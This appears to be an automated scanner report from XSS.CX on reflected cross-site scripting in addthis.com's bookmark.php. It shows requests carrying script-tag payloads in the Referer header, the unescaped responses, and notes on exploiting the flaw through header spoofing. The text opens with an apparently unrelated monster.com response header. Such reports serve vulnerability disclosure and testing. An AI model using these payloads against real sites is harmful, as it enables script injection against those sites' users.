HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:06 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=hhjcrn55rrwzs455qnz3mz3n; path=/; HttpOnly Set-Cookie: uslc=1; domain=.monster.com; expires=Sun, 26-Dec-2010 18:08:06 GMT; path=/ Set-Cookie: webtrends_Profile=true; path=/ Set-Cookie: TC_Top=; expires=Fri, 19-Nov-2010 18:08:06 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Fri, 19-Nov-2010 18:08:06 GMT; path=/ Set-Cookie: rComms=11-8-13-14-2-1-12-4-7-3-10-9-5-6-15-16-17-18; domain=.monster.com; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 111461 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26905"><script>alert(1)</script>b22d59dfac3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=26905"><script>alert(1)</script>b22d59dfac3
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:30:29 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 92208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=26905"><script>alert(1)</script>b22d59dfac3" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 99be8<script>alert(1)</script>fd1c2d4b6a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=99be8<script>alert(1)</script>fd1c2d4b6a0
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:30:30 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 92194
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>99be8<script>alert(1)</script>fd1c2d4b6a0 - Google search</h4> ...[SNIP]...
Report generated by XSS.CX at Sun Dec 19 15:35:53 CST 2010.